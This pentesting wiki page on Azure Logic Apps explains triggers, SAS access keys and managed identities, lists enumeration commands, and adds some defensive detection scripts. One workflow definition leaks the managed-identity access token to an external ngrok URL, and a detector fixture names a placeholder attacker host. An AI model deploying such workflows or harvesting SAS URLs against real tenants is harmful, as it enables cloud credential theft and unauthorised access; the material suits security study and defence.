Az - Logic Apps

Reading time: 15 minutes

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Azure Logic Apps allows developers to create and run workflows that integrate different services, data sources, and applications. These workflows are designed to automate business processes, schedule tasks, and perform data integration between different platforms.

Logic Apps provides a visual designer for building workflows, with many pre-built connectors that make it easy to connect to and interact with different services:

https://infiniteblogs.blob.core.windows.net/medias/4de7fba4-1d43-465a-8c12-8da966a2cdb3_Overview.png

Hosting options

There are several hosting options:

  • Consumption
    • Multi-tenant: Offers shared compute resources, runs in the public cloud, and follows a pay-per-operation pricing model. It is best suited for lightweight, low-cost workloads. This is what we will call a "Single Workflow".
  • Standard
    • Workflow Service Plan: Provides dedicated compute resources and VNET integration for networking, and charges per workflow service plan instance. It suits workloads that need more control.
    • App Service Environment V3: Provides dedicated compute resources with full isolation and scale-out capability. It also includes VNET integration for networking and uses a pricing model based on the App Service instances inside the environment.
    • Hybrid: Designed for on-premises processing and multi-cloud support. It allows customer-managed compute resources with local network access and uses Kubernetes Event-Driven Autoscaling (KEDA). It relies on Container Apps environments.

"Single" Workflows / Consumption Plan

A workflow is a series of automated, ordered steps or tasks that carry out a specific process or goal. It defines how the different actions, conditions, and decisions interact to reach the desired outcome, streamlining operations and reducing manual effort.

tip

The Consumption plan allows creating a single workflow without needing a Logic App itself.

Triggers & Actions

Workflow triggers indicate when a workflow should start. A trigger can be an HTTP endpoint, a schedule, or different events coming from Azure or even from external applications.

Each workflow has different actions. These actions are the steps the workflow follows. Depending on the action, different parameters will be available to configure, such as:

  • Connection name: The connection the action will use to interact with the service.
  • Authentication Type: The options are Access Key, Microsoft Entra ID, Integrated Service principal authentication and Logic Apps Managed Identity.
    • From a read-only perspective, the authentication data is always interesting as it may contain sensitive information.
    • From a write perspective, the authentication data is always interesting as it may allow using the permissions of the granted identity.
  • ...

Actions also have several settings, which depend on the action itself. Some common settings are:

  • Retry Policy: Configures the number of retries and the interval between them.
  • Timeout: Sets the maximum time an action can run before it times out.
  • Run After: Specifies the conditions that must be met before the action runs.
  • Schema Validation: Ensures incoming data follows the defined schema.
  • Networking: Configures how the different headers are handled.
  • Secure Inputs/Outputs: Hides the input/output data from the run history.
  • ...

Authorization Policies

These workflows support authorization policies with Entra ID to protect request-based triggers by requiring a valid access token. This token must contain specific claims:

  • Issuer (iss) to verify the identity provider
  • Audience (aud) to ensure the token is intended for the Logic App
  • Subject (sub) to identify the caller
  • JWT ID (the JSON Web Token identifier)
  • Custom Claim

When a request is received, Logic Apps validates the token against these claims and allows execution only if they match the configured policy. This can be used to allow a different configuration to start the workflow or to deny the trigger from other sources, for example allowing the trigger only if it comes from https://login.microsoftonline.com/.
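Added example (not from the original page) of the claim-matching stage described above, written in Python: a policy is a list of claim name/value pairs, and every pair must appear in the token payload with an identical value, otherwise the trigger is refused. The token builder, the policy values and the tenant id are constructed for the demo; signature verification is assumed to have already happened, as Logic Apps does against Entra ID, so only the payload is inspected here.

```python
import base64
import json

# Constructed policy in the shape described on the page: a list of claims that
# must all be present in the token with exactly these values. The issuer and
# audience strings are placeholders, not values from any real tenant.
EXAMPLE_POLICY = [
    {"name": "iss", "value": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/v2.0"},
    {"name": "aud", "value": "https://management.core.windows.net/"},
]


def decode_jwt_claims(token: str) -> dict:
    """Return the payload claims of a compact JWT (header.payload.signature).

    Only base64url-decodes the middle segment; it does NOT verify the
    signature. In the real flow the signature is validated against Entra ID
    before claim matching, so this models the second stage only.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT")
    payload = parts[1]
    payload += "=" * (-len(payload) % 4)  # restore base64 padding stripped by JWT encoding
    return json.loads(base64.urlsafe_b64decode(payload))


def claims_satisfy_policy(claims: dict, policy: list) -> tuple:
    """Return (allowed, failed) where failed lists the policy claims not matched.

    Every policy claim must be present with an identical value. Extra claims
    in the token are ignored; a missing or different claim rejects the token.
    (Real tokens may carry 'aud' as a list; this demo compares scalars only.)
    """
    failed = [c["name"] for c in policy if claims.get(c["name"]) != c["value"]]
    return (len(failed) == 0, failed)


def make_unsigned_token(claims: dict) -> str:
    """Build a constructed JWT with a dummy signature for demonstration only."""
    def b64(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")
    return f"{b64({'alg': 'RS256', 'typ': 'JWT'})}.{b64(claims)}.dummysig"


def evaluate(token: str, policy: list = EXAMPLE_POLICY) -> bool:
    """Decision the trigger would take for this token under the given policy."""
    allowed, _ = claims_satisfy_policy(decode_jwt_claims(token), policy)
    return allowed


if __name__ == "__main__":
    good = make_unsigned_token({"iss": EXAMPLE_POLICY[0]["value"],
                                "aud": EXAMPLE_POLICY[1]["value"], "sub": "caller"})
    bad = make_unsigned_token({"iss": "https://other-idp.example.invalid/",
                               "aud": EXAMPLE_POLICY[1]["value"]})
    print("good token allowed:", evaluate(good))
    print("bad token allowed:", evaluate(bad))
```

Note that a token that only matches the audience is rejected because the issuer claim differs; this is what makes the policy usable to restrict callers to a single identity provider as the text describes.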

Access Keys

Workflows generate 2 access keys when they are created. These keys are used to authenticate and authorize requests to the workflow. The keys are used to generate a Shared Access Signature (SAS) token, which is included in the request URL.

Therefore, when an HTTP trigger is created, a unique HTTP endpoint with a SAS signature that grants permission to call the workflow is generated.

These keys can be regenerated, and a new SAS URL will be generated for these triggers, but the values of the keys themselves cannot be accessed.

Example of a SAS URL to fire a trigger:

https://<region>.logic.azure.com:443/workflows/<workflow-id>/triggers/<trigger-name>/paths/invoke?api-version=<api-version>&sp=%2Ftriggers%2F<trigger-name>%2Frun&sv=<version>&sig=<signature>
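As an added example (not part of the original page), the following Python takes the SAS URL layout shown above and does two defensive things with it: it spots Logic Apps trigger URLs carrying the sp/sv/sig triple inside log text, and it redacts the sig value so the line can be retained without the secret. The log lines, host names, workflow ids and signatures are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, urlencode, urlunsplit

# Constructed log lines (not real data). Two of them contain Logic Apps
# trigger URLs whose sig= parameter is the SAS signature: anyone holding that
# URL can fire the trigger until the access keys are regenerated.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z INFO webhook registered url=https://prod-12.westeurope.logic.azure.com:443/workflows/abc123/triggers/manual/paths/invoke?api-version=2016-10-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=AbCdEfGhIjKlMnOpQrStUvWxYz0123456789
2024-05-01T10:00:01Z INFO health check url=https://example.com/healthz?verbose=1
2024-05-01T10:00:02Z INFO callback url=https://prod-07.eastus.logic.azure.com/workflows/def456/triggers/When_a_HTTP_request_is_received/paths/invoke?api-version=2016-06-01&sp=%2Ftriggers%2FWhen_a_HTTP_request_is_received%2Frun&sv=1.0&sig=ZyXwVuTsRqPoNmLkJiHgFeDcBa9876543210
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
SAS_PARAMS = {"sp", "sv", "sig"}  # the three query parameters of a Logic Apps SAS


def is_logic_app_sas_url(url: str) -> bool:
    """True when the URL targets *.logic.azure.com and carries the full SAS triple."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not (host == "logic.azure.com" or host.endswith(".logic.azure.com")):
        return False
    return SAS_PARAMS <= set(parse_qs(parts.query).keys())


def redact_sig(url: str) -> str:
    """Replace the sig= value so the URL can be stored without the secret."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    if "sig" in query:
        query["sig"] = ["REDACTED"]
    return urlunsplit(parts._replace(query=urlencode(query, doseq=True)))


def scan_log(text: str) -> list:
    """Return (workflow_id, trigger_name, redacted_url) for each SAS URL found."""
    findings = []
    for line in text.splitlines():
        for url in URL_RE.findall(line):
            if not is_logic_app_sas_url(url):
                continue
            segs = urlsplit(url).path.strip("/").split("/")
            # path layout: workflows/<workflow-id>/triggers/<trigger-name>/paths/invoke
            workflow_id = segs[1] if len(segs) > 1 else ""
            trigger = segs[3] if len(segs) > 3 else ""
            findings.append((workflow_id, trigger, redact_sig(url)))
    return findings


if __name__ == "__main__":
    for workflow_id, trigger, url in scan_log(SAMPLE_LOG):
        print(f"SAS trigger URL for workflow {workflow_id} / trigger {trigger}: {url}")
```

A practical consequence of the layout: because the signature lives in the query string, the URL tends to end up in proxy logs, ticketing systems and chat history, and the only way to revoke a copied one is to regenerate the access keys, which invalidates every existing URL of that workflow.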

Workflow Settings & Components

  • Trigger access option: This setting lets you restrict who can trigger or start your workflow. The options are Any IP, Only other workflows and Specific IP ranges.
  • Integration account: Link your workflow to an Integration Account.
  • High throughput: When enabled, allows handling more requests concurrently and faster.
  • Run history retention: Indicates the number of days to keep the run history.
  • API connections: Shows the different API connections the workflow has. Inside each of these connections there are different properties and the possibility to edit the API connection, where the Authentication type can be changed.
  • History: Offers the option to access the history of previous executions and obtain their data: Settings, Outputs, Parameters and Code.
  • Versions: Offers the option to access the different versions of the workflow, where you can check the code and replace the current workflow with a previous version of it.
  • Managed Identities: It is possible to assign one system-assigned managed identity and several user-assigned identities to a workflow.

Leak MI access tokens

An HTTP action in a workflow can be used to send data to an external site. In the Advanced parameters of the HTTP action, it is possible to set the Authentication Type to Managed identity and then select the assigned Managed Identity to use (system- or user-assigned).

Moreover, it is possible to indicate in Audience the audience of the generated JWT, which could be for example https://management.azure.com/ in order to be able to use the generated token to access the Azure management API.

warning

Making the action send an HTTP request to an attacker-controlled server could leak the access token of the managed identity assigned to the workflow.

tip

An attacker could also use other types of actions to directly access other Azure services and perform actions with the permissions of the managed identity.

This is the code of a workflow that exposes an HTTP trigger and then uses an HTTP action to leak the access token to the configured URL (ngrok in this case):

Workflow code
json
{
  "definition": {
    "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
    "contentVersion": "1.0.0.0",
    "triggers": {
      "When_a_HTTP_request_is_received": {
        "type": "Request",
        "kind": "Http"
      }
    },
    "actions": {
      "HTTP": {
        "runAfter": {},
        "type": "Http",
        "inputs": {
          "uri": "https://22b6-81-33-70-107.ngrok-free.app",
          "method": "GET",
          "authentication": {
            "type": "ManagedServiceIdentity",
            "audience": "https://management.azure.com/"
          }
        },
        "runtimeConfiguration": {
          "contentTransfer": {
            "transferMode": "Chunked"
          }
        }
      }
    },
    "outputs": {},
    "parameters": {
      "$connections": {
        "type": "Object",
        "defaultValue": {}
      }
    }
  },
  "parameters": {
    "$connections": {
      "type": "Object",
      "value": {}
    }
  }
}
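Added example, not from the original page: a small static check a defender can run over exported workflow definitions to find HTTP actions that attach a managed-identity token (authentication type ManagedServiceIdentity) and send it to a host outside a trusted list, which is exactly the pattern of the workflow above. The definition below is constructed after that one; the placeholder hosts and the trusted-host list are the author's assumptions and should be tuned per tenant.

```python
from urllib.parse import urlsplit

# Constructed workflow definition (not taken from any real tenant), modelled on
# the page's example: one HTTP action sends the managed-identity token to an
# external host, one calls the management API legitimately, and one is hidden
# inside a Scope with a uri that is only resolved at run time.
SAMPLE_DEFINITION = {
    "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
    "contentVersion": "1.0.0.0",
    "triggers": {"When_a_HTTP_request_is_received": {"type": "Request", "kind": "Http"}},
    "actions": {
        "HTTP": {
            "type": "Http",
            "inputs": {
                "uri": "https://attacker-host.example.invalid",  # placeholder external host
                "method": "GET",
                "authentication": {"type": "ManagedServiceIdentity", "audience": "https://management.azure.com/"},
            },
        },
        "List_subscriptions": {
            "type": "Http",
            "inputs": {
                "uri": "https://management.azure.com/subscriptions?api-version=2020-01-01",
                "method": "GET",
                "authentication": {"type": "ManagedServiceIdentity", "audience": "https://management.azure.com/"},
            },
        },
        "Cleanup_scope": {
            "type": "Scope",
            "actions": {
                "Nested_HTTP": {
                    "type": "Http",
                    "inputs": {
                        "uri": "@parameters('target')",  # workflow expression, unknown until run time
                        "method": "POST",
                        "authentication": {"type": "ManagedServiceIdentity", "audience": "https://graph.microsoft.com/"},
                    },
                }
            },
        },
    },
}

# Hosts that may legitimately receive a bearer token minted for the workflow's
# managed identity. Assumption: illustrative list only, adjust per tenant.
TRUSTED_HOST_SUFFIXES = (
    "management.azure.com",
    "graph.microsoft.com",
    "vault.azure.net",
    "core.windows.net",
    "database.windows.net",
)


def host_is_trusted(uri) -> bool:
    """Static check of an action's uri. A workflow expression (@...) cannot be
    resolved here, so it is treated as untrusted and surfaced for review."""
    if not isinstance(uri, str) or uri.startswith("@"):
        return False
    host = (urlsplit(uri).hostname or "").lower()
    return any(host == s or host.endswith("." + s) for s in TRUSTED_HOST_SUFFIXES)


def _walk_actions(actions: dict):
    """Yield (name, action) for every action, descending into Scope/If/Switch
    containers, which nest their children under 'actions', 'else' or 'cases'."""
    for name, action in actions.items():
        yield name, action
        yield from _walk_actions(action.get("actions", {}))
        yield from _walk_actions(action.get("else", {}).get("actions", {}))
        for case in action.get("cases", {}).values():
            yield from _walk_actions(case.get("actions", {}))


def find_mi_exfil_actions(definition: dict) -> list:
    """Return (action_name, uri, audience) for HTTP actions that attach a
    managed-identity token and send it to a host outside the trusted list."""
    hits = []
    for name, action in _walk_actions(definition.get("actions", {})):
        if action.get("type") != "Http":
            continue
        inputs = action.get("inputs", {})
        auth = inputs.get("authentication", {})
        if auth.get("type") != "ManagedServiceIdentity":
            continue
        uri = inputs.get("uri", "")
        if not host_is_trusted(uri):
            hits.append((name, uri, auth.get("audience")))
    return hits


if __name__ == "__main__":
    for name, uri, audience in find_mi_exfil_actions(SAMPLE_DEFINITION):
        print(f"review action {name!r}: MSI token for {audience} sent to {uri}")
```

The same walk can be pointed at the definition returned by the enumeration commands further down; the check flags the nested action too, because a uri given as a workflow expression cannot be proven safe from the definition alone.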

Logic Apps / Standard Plan

Differences from "Single" Workflows

Logic apps basically use an App Service in the background to host a logic app that can contain several workflows. This means the logic app will have all the features of an App Service plus those of the "Single" Workflows.

Some important features are:

  • App Service Plan: Logic Apps in the Standard plan are hosted on an App Service Plan, so it is possible to use all the App Service features such as:
    • Network restrictions: Indicate from where it is accessible.
    • Deployment Center: Deploy from external platforms like Github, Bitbucket, Azure Repos, External Git and Local Git.
    • FTP access: It is possible to access the Logic App files via FTP.
    • Storage Account: The app service uses a storage account to store information.
    • Environment Variables & App Settings: It is possible to configure environment variables and app settings (and to find sensitive information such as access keys to the storage account).
    • ...
  • Parameters: Parameters let you manage values that change between development, test, and production. This lets you design the workflows first and then easily adjust the environment-specific settings later.
  • Dedicated resources: Logic Apps in the Standard plan have dedicated resources.
  • Multiple workflows: Allows creating multiple workflows.

For more information about App Services check:

Az - Azure App Services

Enumeration

bash
# List workflows (Consumption)
az logic workflow list --resource-group <ResourceGroupName>
# Get info about a workflow
az logic workflow show --name <LogicAppName> --resource-group <ResourceGroupName>

# Get details of a specific Logic App workflow, including its connections and parameters
# (note the escaped \$expand so the shell does not try to expand it as a variable)
az rest \
--method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}?api-version=2016-10-01&\$expand=connections.json,parameters.json" \
--headers "Content-Type=application/json"

# Get details about triggers for a specific Logic App
az rest --method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers?api-version=2016-06-01"

# Get the callback URL (SAS URL) for a specific trigger in a Logic App
az rest --method POST \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/listCallbackUrl?api-version=2016-06-01"

# Get the history of a specific trigger in a Logic App
az rest --method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/histories?api-version=2016-06-01"

# List all runs of a specific Logic App workflow
az rest \
--method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs?api-version=2016-06-01" \
--headers "Content-Type=application/json"

# Get all actions within a specific run of a Logic App workflow
az rest \
--method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs/{runName}/actions?api-version=2016-06-01" \
--headers "Content-Type=application/json"

# List all versions of a specific Logic App workflow
az rest \
--method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions?api-version=2016-06-01" \
--headers "Content-Type=application/json"

# Get details of a specific version of a Logic App workflow
az rest \
--method GET \
--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions/{versionName}?api-version=2016-06-01" \
--headers "Content-Type=application/json"

# List all Logic Apps (Standard) in the specified resource group
az logicapp list --resource-group <ResourceGroupName>

# Show detailed information about a specific Logic App
az logicapp show --name <LogicAppName> --resource-group <ResourceGroupName>

# List all application settings for a specific Logic App
az logicapp config appsettings list --name <LogicAppName> --resource-group <ResourceGroupName>

# Get the parameters.json file of a Standard Logic App (hosted on App Service) using the Azure REST API
az rest --method GET --url "https://management.azure.com/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/Microsoft.Web/sites/{app-service-name}/hostruntime/admin/vfs/parameters.json?api-version=2018-11-01&relativepath=1"

# Get webhook-triggered workflows from an Azure Logic App using the Azure REST API
az rest --method GET --url "https://management.azure.com/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/Microsoft.Web/sites/{logic-app-name}/hostruntime/runtime/webhooks/workflow/api/management/workflows?api-version=2018-11-01"

# Get workflows from an Azure Logic App using the Azure REST API
az rest --method GET --url "https://management.azure.com/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/Microsoft.Web/sites/{logic-app-name}/workflows?api-version=2018-11-01"

# Get details of a specific workflow including its connections and parameters in Azure Logic Apps using the Azure REST API
az rest --method GET --uri "https://management.azure.com/subscriptions/{subscription-id}/resourceGroups/{resource-group-name}/providers/Microsoft.Web/sites/{logic-app-name}/workflows/{workflow-name}?api-version=2018-11-01&\$expand=connections.json,parameters.json"


Integration Accounts

Integration Accounts are a feature of Azure Logic Apps. They are used to enable enterprise-level integration by providing advanced B2B capabilities, such as EDI, AS2, and XML schema management. Integration Accounts are containers in Azure that store the following artifacts used by Logic Apps:

  • Schemas: Manage XML schemas for validating and processing messages in your integration account.
  • Maps: Configure XSLT-based transformations to convert data formats within your integration workflows.
  • Assemblies: Manage integration account assemblies to extend logic and data processing.
  • Certificates: Handle certificates for encrypting and signing messages, ensuring secure communication.
  • Partners: Manage trading partner information for B2B transactions, enabling seamless integration.
  • Agreements: Configure rules and settings for data exchange with trading partners (e.g., EDI, AS2).
  • Batch Configurations: Manage batch processing settings to group and process messages efficiently.
  • RosettaNet PIP: Configure RosettaNet Partner Interface Processes (PIPs) for standardized B2B communication.

Enumeration

bash
# Integration account
az logic integration-account list --resource-group <resource-group-name>
az logic integration-account show --resource-group <resource-group-name> --name <integration-account-name>
az logic integration-account list-callback-url --resource-group <resource-group-name> --integration-account-name <integration-account-name>

# Batch-configuration
az logic integration-account batch-configuration list \
--resource-group <resource-group-name> \
--integration-account-name <integration-account-name>

az logic integration-account batch-configuration show \
--resource-group <resource-group-name> \
--integration-account-name <integration-account-name> \
--batch-configuration-name <batch-configuration-name>

# Map
az logic integration-account map list \
--resource-group <resource-group-name> \
--integration-account <integration-account-name>

az logic integration-account map show \
--resource-group <resource-group-name> \
--integration-account <integration-account-name> \
--map-name <map-name>

# Partner
az logic integration-account partner list \
--resource-group <resource-group-name> \
--integration-account <integration-account-name>

az logic integration-account partner show \
--resource-group <resource-group-name> \
--integration-account <integration-account-name> \
--name <partner-name>

# Session
az logic integration-account session list \
--resource-group <resource-group-name> \
--integration-account <integration-account-name>

az logic integration-account session show \
--resource-group <resource-group-name> \
--integration-account <integration-account-name> \
--name <session-name>

# Assembly
az logic integration-account assembly list \
--resource-group <resource-group-name> \
--integration-account <integration-account-name>

az logic integration-account assembly show \
--resource-group <resource-group-name> \
--integration-account <integration-account-name> \
--assembly-artifact-name <assembly-name>


Privilege Escalation

As for logic apps privesc:

Az - Logic Apps Privesc

Post Exploitation

Az - Logic Apps Post Exploitation

Persistence

Az - Logic Apps Persistence
